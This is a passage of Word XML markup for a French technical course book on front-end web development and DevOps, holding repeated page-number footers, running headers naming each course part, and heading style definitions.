        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText w:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>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14" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ESPRITROPIC COMMUNITY · Bibliothèque technique</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText w:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>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14" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ESPRITROPIC COMMUNITY · Bibliothèque technique</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText w:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rP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14" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ESPRITROPIC COMMUNITY · Bibliothèque technique</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText w:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>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14" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ESPRITROPIC COMMUNITY · Bibliothèque technique</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText w:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rP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14" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ESPRITROPIC COMMUNITY · Bibliothèque technique</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText w:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rP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14" w:val="right"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="14"/>
      </w:rPr>
      <w:t>ESPRITROPIC COMMUNITY · Bibliothèque technique</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText w:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="0F2E4C"/>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0A21B"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="9014" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:caps/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>Développement web &amp; DevOps</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:tab/>
      <w:t>Pages liminaires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0A21B"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="9014" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:caps/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>Cours 1 · Développement web front-end</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:tab/>
      <w:t>Présentation du cours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0A21B"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="9014" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:caps/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>Cours 1 · Développement web front-end</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:tab/>
      <w:t>Partie I · Les fondations du Web</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0A21B"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="9014" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:caps/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>Cours 1 · Développement web front-end</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:tab/>
      <w:t>Partie II · CSS : mise en forme et design</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0A21B"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="9014" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:caps/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>Cours 1 · Développement web front-end</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:tab/>
      <w:t>Partie III · Mise en page moderne et accessibilité</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0A21B"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="9014" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:caps/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>Cours 1 · Développement web front-end</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:tab/>
      <w:t>Partie IV · JavaScript et interactivité</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0A21B"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="9014" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:caps/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>Cours 1 · Développement web front-end</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:tab/>
      <w:t>Partie V · Qualité, performance et mise en production</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0A21B"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="9014" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:caps/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>Cours 1 · Développement web front-end</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:tab/>
      <w:t>Partie VI · Approfondissements</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0A21B"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="9014" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:caps/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>Cours 1 · Développement web front-end</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:tab/>
      <w:t>Partie VII · Le Web comme plateforme</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0A21B"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="9014" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:caps/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>Cours 2 · DevOps, cloud et fiabilité</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:tab/>
      <w:t>Présentation du cours</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0A21B"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="9014" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:caps/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>Cours 2 · DevOps, cloud et fiabilité</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:tab/>
      <w:t>Partie I · Culture DevOps et systèmes</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0A21B"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="9014" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:caps/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>Cours 2 · DevOps, cloud et fiabilité</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:tab/>
      <w:t>Partie II · Réseaux, protocoles et serveurs</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0A21B"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="9014" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:caps/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>Cours 2 · DevOps, cloud et fiabilité</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:tab/>
      <w:t>Partie III · Conteneurs et orchestration</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0A21B"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="9014" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:caps/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>Cours 2 · DevOps, cloud et fiabilité</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:tab/>
      <w:t>Partie IV · Cloud, provisionnement et configuration</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0A21B"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="9014" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:caps/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>Cours 2 · DevOps, cloud et fiabilité</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:tab/>
      <w:t>Partie V · Livraison, sécurité et exploitation</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0A21B"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="9014" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:caps/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>Cours 2 · DevOps, cloud et fiabilité</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:tab/>
      <w:t>Partie VI · Systèmes distribués et industrialisation</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0A21B"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="9014" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:caps/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>Cours 2 · DevOps, cloud et fiabilité</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:tab/>
      <w:t>Partie VII · Mise en pratique</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0A21B"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:pos="9014" w:val="right"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:caps/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>Annexes</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6770"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:tab/>
      <w:t>Ressources et repères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val="0"/>
      <w:spacing w:line="348" w:lineRule="exact" w:before="0" w:after="150"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
      <w:color w:val="1F2933"/>
      <w:sz w:val="23"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-F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val="0"/>
      <w:spacing w:before="0" w:after="280" w:line="540" w:lineRule="exact"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i w:val="0"/>
      <w:color w:val="0F2E4C"/>
      <w:sz w:val="46"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00FC693F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="0" w:after="280" w:line="540" w:lineRule="exact"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i w:val="0"/>
      <w:color w:val="0F2E4C"/>
      <w:sz w:val="46"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00FC693F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="440" w:after="180" w:line="390" w:lineRule="exact"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i w:val="0"/>
      <w:color w:val="274B6D"/>
      <w:sz w:val="29"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00FC693F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="300" w:after="140" w:line="320" w:lineRule="exact"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i w:val="0"/>
      <w:iCs/>
      <w:color w:val="0F2E4C"/>
      <w:sz w:val="23"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR"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reCours">
    <w:name w:val="Titre de cours"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="0" w:after="200" w:line="730" w:lineRule="exact"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
      <w:b/>
      <w:i w:val="0"/>
      <w:color w:val="0F2E4C"/>
      <w:sz w:val="54"/>
      <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TitrePartie">
    <w:name w:val="Titre de partie"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
